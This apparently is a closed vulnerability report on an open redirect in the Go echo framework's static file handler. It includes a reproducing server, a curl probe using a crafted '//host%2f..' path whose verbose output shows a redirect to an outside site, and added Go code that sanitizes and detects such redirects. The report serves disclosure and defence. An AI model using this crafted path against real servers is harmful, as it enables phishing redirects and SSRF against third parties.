Closed
Issue Description
301 redirect, and may further cause SSRF.
Also see:
Django CVE-2018-14574
```go
package main

import (
	"github.com/labstack/echo/v4"
)

func main() {
	e := echo.New()
	// Serve the current directory at "/"; directory requests without a
	// trailing slash are answered with a 301 to the request path plus "/".
	e.Static("/", "./")
	e.Logger.Fatal(e.Start(":1323"))
}
```
```
D:\> curl -Lv http://127.0.0.1:1323//ruokeqx.gitee.io%2f..
* Trying 127.0.0.1:1323...
* Connected to 127.0.0.1 (127.0.0.1) port 1323 (#0)
> GET //ruokeqx.gitee.io%2f.. HTTP/1.1
> Host: 127.0.0.1:1323
> User-Agent: curl/7.83.1
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
< Location: //ruokeqx.gitee.io/../
< Date: Sun, 04 Sep 2022 18:47:04 GMT
< Content-Length: 0
<
* Connection #0 to host 127.0.0.1 left intact
* Clear auth, redirects to port from 1323 to 80
* Issue another request to this URL: 'http://ruokeqx.gitee.io/'
* Trying 212.64.63.190:80...
* Connected to ruokeqx.gitee.io (212.64.63.190) port 80 (#1)
> GET / HTTP/1.1
> Host: ruokeqx.gitee.io
> User-Agent: curl/7.83.1
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 04 Sep 2022 18:47:03 GMT
< Content-Type: text/html
< Content-Length: 182
< Connection: keep-alive
< Server: openresty
< Location: https://ruokeqx.gitee.io/
< Expires: Mon, 05 Sep 2022 18:47:03 GMT
< Cache-Control: max-age=86400
<
* Ignoring the response-body
* Connection #1 to host ruokeqx.gitee.io left intact
* Clear auth, redirects to port from 80 to 443
* Issue another request to this URL: 'https://ruokeqx.gitee.io/'
* Trying 212.64.63.190:443...
* Connected to ruokeqx.gitee.io (212.64.63.190) port 443 (#2)
* schannel: disabled automatic use of client certificate
* ALPN: offers http/1.1
* ALPN: server accepted http/1.1
> GET / HTTP/1.1
> Host: ruokeqx.gitee.io
> User-Agent: curl/7.83.1
> Accept: */*
>
* schannel: failed to decrypt data, need more data
* schannel: failed to decrypt data, need more data
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sun, 04 Sep 2022 18:47:04 GMT
< Content-Type: text/html
< Content-Length: 94632
< Connection: keep-alive
< Server: openresty
< Last-Modified: Sun, 04 Sep 2022 17:49:25 GMT
< ETag: "6314e525-171a8"
< Expires: Mon, 05 Sep 2022 18:47:04 GMT
< Cache-Control: max-age=86400
< Accept-Ranges: bytes
<
<!DOCTYPE html>
...
```
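The transcript shows the mechanism: `net/http` decodes the `%2f` in the request-target, so the static handler sees the path `//ruokeqx.gitee.io/..`, appends `/`, and emits it as a `Location` header that browsers treat as a scheme-relative URL to another host. The following is an added, standard-library-only example (not echo's code) that models that redirect construction, a leading-slash normalization that closes the hole (an assumed mitigation, not a quote of the upstream fix), and a response-side check that flags off-site `Location` values:

```go
package main

import (
	"net/url"
	"strings"
)

// sanitizeRedirectPath collapses a run of leading slashes or backslashes into
// a single "/", so a Location built from the request path can never become a
// scheme-relative URL ("//host/...") that browsers resolve to another origin.
func sanitizeRedirectPath(p string) string {
	if len(p) > 1 && (p[0] == '/' || p[0] == '\\') && (p[1] == '/' || p[1] == '\\') {
		return "/" + strings.TrimLeft(p, `/\`)
	}
	return p
}

// staticRedirectLocation models a static handler that answers a directory
// request lacking a trailing slash with a 301 to path+"/". target is the raw
// request-target; url.ParseRequestURI decodes it the way net/http does, so the
// %2f in the issue's probe becomes a literal "/". hardened=false reproduces
// the Location seen in the issue.
func staticRedirectLocation(target string, hardened bool) (string, error) {
	u, err := url.ParseRequestURI(target)
	if err != nil {
		return "", err
	}
	p := u.Path
	if hardened {
		p = sanitizeRedirectPath(p)
	}
	if !strings.HasSuffix(p, "/") {
		p += "/"
	}
	return p, nil
}

// isOffSiteRedirect is a response-side check (usable in a proxy or a test):
// it reports whether a Location value would send the client to a host other
// than ourHost. Scheme-relative values count as off-site.
func isOffSiteRedirect(location, ourHost string) bool {
	u, err := url.Parse(location)
	if err != nil {
		return true // unparseable Location: treat as unsafe
	}
	schemeRelative := strings.HasPrefix(location, "//") || strings.HasPrefix(location, `\\`)
	if u.Host == "" && !schemeRelative {
		return false // plain path: stays on this origin
	}
	return !strings.EqualFold(u.Host, ourHost)
}
```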